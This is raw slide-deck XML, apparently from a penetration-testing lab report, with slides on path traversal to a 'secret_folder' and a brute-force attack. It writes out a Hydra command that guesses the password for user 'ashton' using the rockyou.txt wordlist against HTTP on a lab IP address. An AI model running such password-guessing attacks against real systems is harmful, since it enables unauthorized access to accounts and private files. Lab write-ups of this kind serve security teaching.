              <a:t>Hannah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> … </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>I am constantly having to teach [Ashton]</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>how to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;118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188" name="Shape 1188"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #2: Path Traversal, continued</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;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191" name="Google Shape;1191;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724200" y="834463"/>
            <a:ext cx="7856100" cy="38004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2" name="Google Shape;1192;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="20571" r="0" t="58206"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724200" y="2045200"/>
            <a:ext cx="7856099" cy="2132911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7071300" y="2755450"/>
            <a:ext cx="888300" cy="1212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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741150" y="1204675"/>
            <a:ext cx="7661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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>🔍 192.168.1.105/company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Google Shape;1195;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199" name="Shape 1199"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;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Exploitation #3: Brute-Force Attack</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;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202" name="Google Shape;1202;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2750150" y="894125"/>
            <a:ext cx="5810100" cy="3648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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2750300" y="843950"/>
            <a:ext cx="5209200" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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b="1" lang="en" sz="2700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Wha</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>t do we have?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>✔ File path</a:t>
            </a:r>
            <a:endParaRPr sz="27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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>✔ Username</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>✔ Port number and service </a:t>
            </a:r>
            <a:endParaRPr sz="2700">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sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>✔ Hydra      </a:t>
            </a:r>
            <a:endParaRPr sz="2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500">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What do we want?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>    The password!</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-1876444">
            <a:off x="1089744" y="1218136"/>
            <a:ext cx="1424061" cy="996281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1679701">
            <a:off x="1089742" y="3174785"/>
            <a:ext cx="1424064" cy="996281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;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10" name="Shape 1210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #3: Brute-Force Attack, continued</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Google Shape;1212;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213" name="Google Shape;1213;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="415775" y="716225"/>
            <a:ext cx="8058300" cy="2935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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521525" y="692650"/>
            <a:ext cx="7846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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  -l ashton </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    -P rockyou.txt </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      -s 80 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        -f -vV </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>          192.168.1.105 </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>            http-get </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="577738"/>
            <a:ext cx="91440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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Hydra Command &amp; The Result</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="26066" l="0" r="4205" t="44879"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415775" y="3683625"/>
            <a:ext cx="7971900" cy="1084975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7000525" y="4101450"/>
            <a:ext cx="748200" cy="53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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521525" y="723415"/>
            <a:ext cx="7846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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;121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14">
                                            <p:txEl>
                                              <p:pRg end="0" st="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="121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214">
                                            <p:txEl>
                                              <p:pRg end="1" st="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="121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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">
                                            <p:txEl>
                                              <p:pRg end="2" st="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">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8">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">
                                            <p:txEl>
                                              <p:pRg end="3" st="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="entr" presetID="2" presetSubtype="8">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">
                                            <p:txEl>
                                              <p:pRg end="4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="entr" presetID="2" presetSubtype="8">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">
                                            <p:txEl>
                                              <p:pRg end="5" st="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="afterEffect" presetClass="entr" presetID="2" presetSubtype="8">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">
                                            <p:txEl>
                                              <p:pRg end="6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1214">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8000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="after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23" name="Shape 1223"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;122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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #3: Brute Force Attack, continued</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;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226" name="Google Shape;1226;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724200" y="834463"/>
            <a:ext cx="7856100" cy="38004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7" name="Google Shape;1227;p70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="724200" y="1035500"/>
            <a:ext cx="7856099" cy="3142611"/>
            <a:chOff x="724200" y="1035500"/>
            <a:chExt cx="7856099" cy="3142611"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1228" name="Google Shape;1228;p70"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="20571" r="0" t="58206"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="724200" y="2045200"/>
              <a:ext cx="7856099" cy="2132911"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1229" name="Google Shape;1229;p70"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="741150" y="1035500"/>
              <a:ext cx="7661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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>🔍 192.168.1.105/company_folders/secret_folder</a:t>
              </a:r>
              <a:endParaRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1856550" y="2863450"/>
            <a:ext cx="1335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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:endParaRPr b="1">
